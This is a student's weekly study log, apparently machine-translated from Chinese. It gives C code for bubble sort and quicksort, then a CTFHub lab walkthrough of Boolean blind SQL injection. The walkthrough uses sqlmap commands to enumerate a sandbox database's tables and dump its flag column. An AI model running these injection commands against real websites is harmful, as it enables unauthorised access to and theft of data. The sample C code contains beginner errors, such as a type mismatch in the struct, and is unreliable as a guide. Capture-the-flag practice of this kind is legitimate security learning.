Fourth Weekly
———————————————————————————
This time the weekly report is a bit embarrassed to be released because there is too little to learn.
Subjective reasons--lazy...
objective reasons--forgot to bring a computer after going out for a few days.
Article Directory
Review c language
I haven’t touched it for a long time, and I have forgotten many things, so I reviewed the c language notes I made before
Review SQL injection
Like the C language, there are also many things that I forgot, and I reviewed the sql statement and previous topics.
Simple algorithm problem
1. Application of
bubble sorting Application of bubble sorting plus a structure
#include <stdio.h>
struct student//运用一个结构体,进行分组的定义、输入
{
char name[21];//字符类的都要运用 char 来进行定义
char score;//分数可能带小数点,所以运用char类型
};
int main()
{
struct student a[100],t;//a[100],t定义为结构体类型
int i,j,n;
scanf("%d",&n);//有多少个对象
for(i=1;i<=n;i++)
scanf("%s %d",a[i].name,&a[i].score);//输入结构体的形式a[i].XXXXX对应结构体中的格式
for(i=1;i<=n-1;i++)//冒泡排序
{
for(j=1;j<=n-i;j++)
{
if(a[j].score<a[j+1].score)
{
t=a[j];//t代表的是整个结构体类型
a[j]=a[j+1];
a[j+1]=t;
}
}
}
for(i=1;i<=n;i++)
{
printf("%s\n",a[i].name);//名字、成绩是个整体。名字的排序会按照成绩进行排序。
}
return 0;
}
/*1
冒泡排序的实际应用:
知识点:结构体的定义、结构体形式的输入与输出、冒泡排序。
结构体的用来可方便的定义每一组数据、减少内存。*/
2. Quick Sort
speed sorting
Quick Sort name implies very rapid, in comparison bubble sort and bucket sort, quicksort combines the advantages of both. Fast and save memory. Let me explain to you.
Let
me give you a chestnut: 6 1 2 7 9 3 4 5 10 8 First, we use the first number 6 as the reference number (in fact, it is a reference number), and then we will classify the following numbers, we will be smaller than 6 Numbers placed on the right side of 6 and numbers greater than 6 are placed on the left. As follows. 3 1 2 5 4 6 9 7 10 8 (Sorted from right to left, where the positions of 3 and 6 are exchanged) At this time, we will perform the same procedure on the left and right sides respectively until the final benchmark number is not required on both sides Exchanged (functions are needed here). But this is just our thinking.
We face a set of numbers to use an array, this time we can not be opened in the middle but the first 6 will then exchange the first number of the number 6 and the middle exchange position (even number is not the problem);
specific The first ordering process is as follows:
6 1 2 7 9 3 4 5 10 8
6 1 2 5 9 3 4 7 10 8
6 1 2 5 4 3 9 7 10 8
3 1 2 5 4 6 9 7 10 8 Repeat the above operation for both sides of 6. You must think about it yourself. I will provide my code.
#include <stdio.h>
int a[100];//定义全局变量 有因为两个子函数都要用
void quicksort(int left,int right)
{
int i,t,j,first;
first=a[left];
i=left;
j=right;
while(i!=j)//两边的下标不相同是可以进行循环,相当于从搜索到了中间
{
while(a[j]>=a[left] && i<j)//先从右向左寻找
j--;
while(a[i]<=a[left] && i<j)//从左向右寻找
i++;
if(i<j)//进行交换
{
t=a[j];
a[j]=a[i];
a[i]=t;
}
}
a[left]=a[i];
a[i]=first;//基准数的位置交换
quicksort(left,i-1);//左边交换一轮后 左边要长度要‘-1’因为基准数站了一个位子
quicksort(i+1,right);//右边进行操作
}
int main()
{
int i,n;
printf("请输入数组的长度\n");
scanf("%d",&n);
printf("请输入要排序的数字\n");
for(i=1;i<=n;i++)
{
scanf("%d",&a[i]);
}
quicksort(1,n);
for(i=1;i<=n;++i)
{
printf("%d",a[i]);
}
getchar();getchar();//这里相当于system("pause");
return 0;
}
3. Bucket sorting...
4. Decrypt QQ number...
Boolean blinds
The first thing to understand is what Boolean blinds are.
Boolean blind note: Boolean blind note is generally applicable to the page without an echo field (joint query is not supported), and the web page returns True or false. To put it more simply, when you inject a statement, the page only echoes "true" or "false".
1. The library name of the blasting database
Input: python sqlmap.py -u"http://challenge-cb6615ef28a95b3d.sandbox.ctfhub.com:10080/?id=1" -batch -dbs
Result:
python sqlmap.py -u"XXX" -batch is the basic structure XXXX means to inject "-" into the URL to point to the data that needs to be blasted. "-Dbs" points to the database.
The figure shows the type of database searched:
2. Blasting the name of the table in the current database
Input: python sqlmap.py -u"http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -tables
Here "D" means the database, and "-tables" points to the name of the blasting table.
Result:
Get the two table names flag and news.
3. Blasting column name
Input: python sqlmap.py -u"http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -T"flag" -columns
"-T" means table name, "-columns" points to blasting column name
Result:
The data type obtained is varchar (VARCHAR(M) is a more flexible data type than CHAR. It is also used to represent character data, but VARCHAR can store a variable-length character string.) It is variable here because Here is that the flag in ctfhub is different every time and the flag is a character so it belongs to varchar.
4. Blast the data
input: python sqlmap.py -u"http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -T"flag" -C"flag" -dump
"C" is the column name, and "-dump" is the meaning of exporting data.
result:
Successfully obtained the flag.
If you are not familiar with it, you can use this to blast SQL integer and character types.
You can also learn about manual injection, but it is a bit troublesome.
Sorry, I only learned so much this week, I will adjust my condition next week.